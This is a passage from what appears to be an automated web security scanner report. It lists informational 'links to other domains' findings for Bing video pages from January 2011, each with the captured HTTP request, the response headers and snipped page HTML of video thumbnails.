<span class="motionThumbContainer">
...[SNIP]...
ple&#32;with&#32;decent&#32;health&#32;insurance&#63;&#32;Consumer&#32;Reports&#32;questions&#32;the&#32;Secretary&#32;of&#32;Health&#32;&#38;&#32;Human&#32;Services,&#32;Kathleen&#32;Sebelius." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;e6d56a2d-a19d-41a0-b17e-45384969dc27&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
hpa?q=health%20care&rel=MSN" class="motionThumb playerUrl"
title="Eight&#32;good&#32;things&#32;coming&#32;from&#32;the&#32;recently&#32;passed&#32;health&#32;care&#32;reform&#32;legislation." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9ed95b9b-89f0-49ab-aa9c-71252bc7eee2&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
k&#8217;s&#32;State&#32;of&#32;the&#32;Union&#32;from&#32;President&#32;Obama&#63;&#32;Rep.&#32;Steve&#32;King&#32;&#40;R-Iowa&#41;&#32;joins&#32;msnbc&#8217;s&#32;Lawrence&#32;O&#8217;Donnell." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;7b4e347a-39e0-42f3-90ea-391cf5cf0b1c&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...

title="A&#32;New&#32;Hampshire&#32;health&#32;care&#32;provider&#32;says&#32;health&#32;care&#32;reform&#32;will&#32;increase&#32;demand&#32;for&#32;services&#32;from&#32;fewer&#32;providers." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;d0fa9133-4148-47e4-b080-5dc5e5dbe8bc&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
en&#32;shot&#32;and&#32;killed&#32;while&#32;trying&#32;to&#32;storm&#32;the&#32;Egyptian&#32;interior&#32;ministry&#32;in&#32;Cairo.&#32;CBNC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;e177ac59-7cfe-4492-a8b4-55915bc801ac&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
unt&#32;of&#32;snow&#32;residents&#32;in&#32;the&#32;Northeast&#32;can&#32;expect&#32;to&#32;see&#32;as&#32;well&#32;as&#32;a&#32;chilly&#32;system&#32;expected&#32;to&#32;hit&#32;the&#32;West." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9496e26e-5c57-466b-bd0d-af7ab8a49f84&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
streets&#32;of&#32;Cairo,&#32;Egypt,&#32;while&#32;continuing&#32;to&#32;demand&#32;the&#32;removal&#32;of&#32;President&#32;Mubarak.&#32;CNBC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;93f4a343-3ee5-49a2-bfa8-99e055385b9c&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
;a&#32;gorilla&#32;in&#32;a&#32;British&#32;wildlife&#32;preserve&#32;that&#8217;s&#32;becoming&#32;an&#32;internet&#32;sensation&#32;by&#32;the&#32;way&#32;he&#32;walks&#32;like&#32;a&#32;man." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;38ae05db-21f0-4232-935c-dc0482988d92&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
&#32;fine&#32;diplomatic&#32;line&#32;with&#32;Egyptian&#32;officials&#32;as&#32;unrest&#32;grows&#32;in&#32;the&#32;streets&#32;of&#32;Cairo.&#32;NBC&#39;s&#32;Andrea&#32;Mitchell&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9f5e7858-a321-4506-bd48-5fe5c11524e4&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,52.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

22.407. http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/michaels-new-friend/17w7aehdt

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /videos/watch/video/michaels-new-friend/17w7aehdt?q=ricky+gervais+office&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 104406
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:42 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.078 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:42 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=42008; domain=.bing.com; path=/videos
Set-Cookie: ocid=42008; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=7FC2B9E0CBF74E82B9CBB24E9A9E9968; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c1794478ef78b42b7a8959b47602883b6; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fmichaels-new-friend%2f17w7aehdt%3ffrom%3den-us_fblike&amp;locale=en_US&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;font=arial&amp;colorscheme=dark&amp;height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http&#58;&#47;&#47;img1.video.s-redacted&#47;res&#47;1.0.3710.02&#47;i&#47;videoModule&#47;timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;www.hulu.com&#47;the-office" data-instName="InfoRelatedLinks">Hulu - The Office</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;www.hulu.com&#47;watch&#63;content_id&#61;50117565" data-instName="InfoRelatedLinks">Hulu Watch Page - Michael's New Friend</a>
...[SNIP]...
class="motionThumb playerUrl"
title="The&#32;Office&#32;is&#32;so&#32;successful&#32;that&#32;Ricky&#32;doesn&#39;t&#32;know&#32;how&#32;many&#32;productions&#32;there&#32;are&#32;of&#32;it." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;5bd07dd9-3590-4484-9621-391b29a1d90b&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
ase&#32;of&#32;new&#32;comedy&#32;&#39;The&#32;Invention&#32;Of&#32;Lying&#39;,&#32;we&#32;look&#32;at&#32;the&#32;world&#32;according&#32;to&#32;Ricky&#32;&#34;The&#32;Office&#34;&#32;Gervais." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;215589a9-1f97-49ed-b669-0060f611c09e&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
the&#32;creator&#32;of&#32;the&#32;original&#32;BBC&#32;series,&#32;makes&#32;a&#32;surprise&#32;guest&#32;appearance&#32;on&#32;the&#32;American&#32;version&#32;starring&#32;Steve&#32;Carrell." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;3468c015-6b46-4a4f-b5db-eb9787d7f766&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
earance&#32;on&#32;The&#32;Tonight&#32;Show&#32;and&#32;asks&#32;about&#32;Steve&#32;Carell&#146;s&#32;decision&#32;to&#32;leave&#32;&#34;The&#32;Office&#34;&#32;&#32;after&#32;next&#32;season." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;3cbead54-c048-4526-afe2-2b3b7f49ded7&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
=ricky%20gervais%20office&rel=MSN" class="motionThumb playerUrl"
title="WatchMojo.com&#32;takes&#32;a&#32;look&#32;at&#32;the&#32;career&#32;of&#32;British&#32;comedian&#32;Ricky&#32;Gervais." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;c9d40bcc-d4a5-4d79-8883-8175e2c77d29&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
"
title="The&#32;British&#32;funnyman&#32;brings&#32;his&#32;UK&#32;&#34;Office&#34;&#32;character&#32;overseas&#32;to&#32;go&#32;toe-to-toe&#32;with&#32;Steve&#32;Carell.&#32;See&#32;it&#33;" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;121a8355-038a-40be-881e-7f6760f462e9&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
y%20gervais%20office&rel=MSN" class="motionThumb playerUrl"
title="Slurring&#32;is&#32;part&#32;of&#32;the&#32;English&#32;colloquialisms&#32;that&#32;makes&#32;the&#32;shows&#32;so&#32;real." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;2603b9e3-bb75-4d93-86a8-34cf8b5813e6&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
cky-gervais-out-of-the-office/17wu9a705?q=ricky%20gervais%20office&rel=MSN" class="motionThumb playerUrl"
title="Ricky&#32;has&#32;done&#32;a&#32;lot&#32;to&#32;get&#32;to&#32;this&#32;point." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;32ae1673-79d7-4501-bf2e-8f88e11f04d0&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
class="motionThumb playerUrl"
title="Rickt&#32;Gervais&#32;talks&#32;to&#32;Jimmy&#32;about&#32;April&#32;Fool&#39;s&#32;Day&#32;and&#32;the&#32;many&#32;spin-offs&#32;of&#32;The&#32;Office." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;bea14d33-fd5b-496c-b0c1-70e719829103&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
17walcvs7?q=ricky%20gervais%20office&rel=MSN" class="motionThumb playerUrl"
title="Ricky&#32;shares&#32;the&#32;secret&#32;to&#32;James&#32;Lipton&#39;s&#32;great&#32;interviewing&#32;skills." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;ac03215c-5e7b-4c20-a6c7-9dede9becfd9&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
en&#32;shot&#32;and&#32;killed&#32;while&#32;trying&#32;to&#32;storm&#32;the&#32;Egyptian&#32;interior&#32;ministry&#32;in&#32;Cairo.&#32;CBNC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;e177ac59-7cfe-4492-a8b4-55915bc801ac&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
unt&#32;of&#32;snow&#32;residents&#32;in&#32;the&#32;Northeast&#32;can&#32;expect&#32;to&#32;see&#32;as&#32;well&#32;as&#32;a&#32;chilly&#32;system&#32;expected&#32;to&#32;hit&#32;the&#32;West." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9496e26e-5c57-466b-bd0d-af7ab8a49f84&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
streets&#32;of&#32;Cairo,&#32;Egypt,&#32;while&#32;continuing&#32;to&#32;demand&#32;the&#32;removal&#32;of&#32;President&#32;Mubarak.&#32;CNBC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;93f4a343-3ee5-49a2-bfa8-99e055385b9c&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
;a&#32;gorilla&#32;in&#32;a&#32;British&#32;wildlife&#32;preserve&#32;that&#8217;s&#32;becoming&#32;an&#32;internet&#32;sensation&#32;by&#32;the&#32;way&#32;he&#32;walks&#32;like&#32;a&#32;man." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;38ae05db-21f0-4232-935c-dc0482988d92&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
&#32;fine&#32;diplomatic&#32;line&#32;with&#32;Egyptian&#32;officials&#32;as&#32;unrest&#32;grows&#32;in&#32;the&#32;streets&#32;of&#32;Cairo.&#32;NBC&#39;s&#32;Andrea&#32;Mitchell&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9f5e7858-a321-4506-bd48-5fe5c11524e4&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,52.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

22.408. http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/michaels-new-friend/17w7aehdt

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /videos/watch/video/michaels-new-friend/17w7aehdt?q=ricky+gervais+office&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=699
Content-Length: 104592
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:12:11 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:32 GMT
Connection: close
Set-Cookie: _SS=SID=A47CDA870BE940568F31C0941DBE5A19; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:32 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cb437b881f8a1493fa95a9a91585bf2f1; expires=Tue, 29-Jan-2013 17:00:32 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:32 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fmichaels-new-friend%2f17w7aehdt%3ffrom%3den-us_fblike&amp;locale=en_US&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;font=arial&amp;colorscheme=dark&amp;height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http&#58;&#47;&#47;img1.video.s-redacted&#47;res&#47;1.0.3710.02&#47;i&#47;videoModule&#47;timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;www.hulu.com&#47;the-office" data-instName="InfoRelatedLinks">Hulu - The Office</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;www.hulu.com&#47;watch&#63;content_id&#61;50117565" data-instName="InfoRelatedLinks">Hulu Watch Page - Michael's New Friend</a>
...[SNIP]...
class="motionThumb playerUrl"
title="The&#32;Office&#32;is&#32;so&#32;successful&#32;that&#32;Ricky&#32;doesn&#39;t&#32;know&#32;how&#32;many&#32;productions&#32;there&#32;are&#32;of&#32;it." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;5bd07dd9-3590-4484-9621-391b29a1d90b&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
ase&#32;of&#32;new&#32;comedy&#32;&#39;The&#32;Invention&#32;Of&#32;Lying&#39;,&#32;we&#32;look&#32;at&#32;the&#32;world&#32;according&#32;to&#32;Ricky&#32;&#34;The&#32;Office&#34;&#32;Gervais." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;215589a9-1f97-49ed-b669-0060f611c09e&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
the&#32;creator&#32;of&#32;the&#32;original&#32;BBC&#32;series,&#32;makes&#32;a&#32;surprise&#32;guest&#32;appearance&#32;on&#32;the&#32;American&#32;version&#32;starring&#32;Steve&#32;Carrell." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;3468c015-6b46-4a4f-b5db-eb9787d7f766&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
earance&#32;on&#32;The&#32;Tonight&#32;Show&#32;and&#32;asks&#32;about&#32;Steve&#32;Carell&#146;s&#32;decision&#32;to&#32;leave&#32;&#34;The&#32;Office&#34;&#32;&#32;after&#32;next&#32;season." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;3cbead54-c048-4526-afe2-2b3b7f49ded7&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
=ricky%20gervais%20office&rel=MSN" class="motionThumb playerUrl"
title="WatchMojo.com&#32;takes&#32;a&#32;look&#32;at&#32;the&#32;career&#32;of&#32;British&#32;comedian&#32;Ricky&#32;Gervais." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;c9d40bcc-d4a5-4d79-8883-8175e2c77d29&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
"
title="The&#32;British&#32;funnyman&#32;brings&#32;his&#32;UK&#32;&#34;Office&#34;&#32;character&#32;overseas&#32;to&#32;go&#32;toe-to-toe&#32;with&#32;Steve&#32;Carell.&#32;See&#32;it&#33;" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;121a8355-038a-40be-881e-7f6760f462e9&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
cky-gervais-out-of-the-office/17wu9a705?q=ricky%20gervais%20office&rel=MSN" class="motionThumb playerUrl"
title="Ricky&#32;has&#32;done&#32;a&#32;lot&#32;to&#32;get&#32;to&#32;this&#32;point." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;32ae1673-79d7-4501-bf2e-8f88e11f04d0&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
y%20gervais%20office&rel=MSN" class="motionThumb playerUrl"
title="Slurring&#32;is&#32;part&#32;of&#32;the&#32;English&#32;colloquialisms&#32;that&#32;makes&#32;the&#32;shows&#32;so&#32;real." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;2603b9e3-bb75-4d93-86a8-34cf8b5813e6&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
deo/ricky-gervais-on-james-lap/17wx0ych1?q=ricky%20gervais%20office&rel=MSN" class="motionThumb playerUrl"
title="Ricky&#32;realizes&#32;it&#32;is&#32;as&#32;awkward&#32;as&#32;it&#32;sounds." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;3566f221-6c01-4fb5-b8d1-4cca2d344157&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
class="motionThumb playerUrl"
title="Rickt&#32;Gervais&#32;talks&#32;to&#32;Jimmy&#32;about&#32;April&#32;Fool&#39;s&#32;Day&#32;and&#32;the&#32;many&#32;spin-offs&#32;of&#32;The&#32;Office." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;bea14d33-fd5b-496c-b0c1-70e719829103&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
en&#32;shot&#32;and&#32;killed&#32;while&#32;trying&#32;to&#32;storm&#32;the&#32;Egyptian&#32;interior&#32;ministry&#32;in&#32;Cairo.&#32;CBNC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;e177ac59-7cfe-4492-a8b4-55915bc801ac&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
unt&#32;of&#32;snow&#32;residents&#32;in&#32;the&#32;Northeast&#32;can&#32;expect&#32;to&#32;see&#32;as&#32;well&#32;as&#32;a&#32;chilly&#32;system&#32;expected&#32;to&#32;hit&#32;the&#32;West." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9496e26e-5c57-466b-bd0d-af7ab8a49f84&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
streets&#32;of&#32;Cairo,&#32;Egypt,&#32;while&#32;continuing&#32;to&#32;demand&#32;the&#32;removal&#32;of&#32;President&#32;Mubarak.&#32;CNBC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

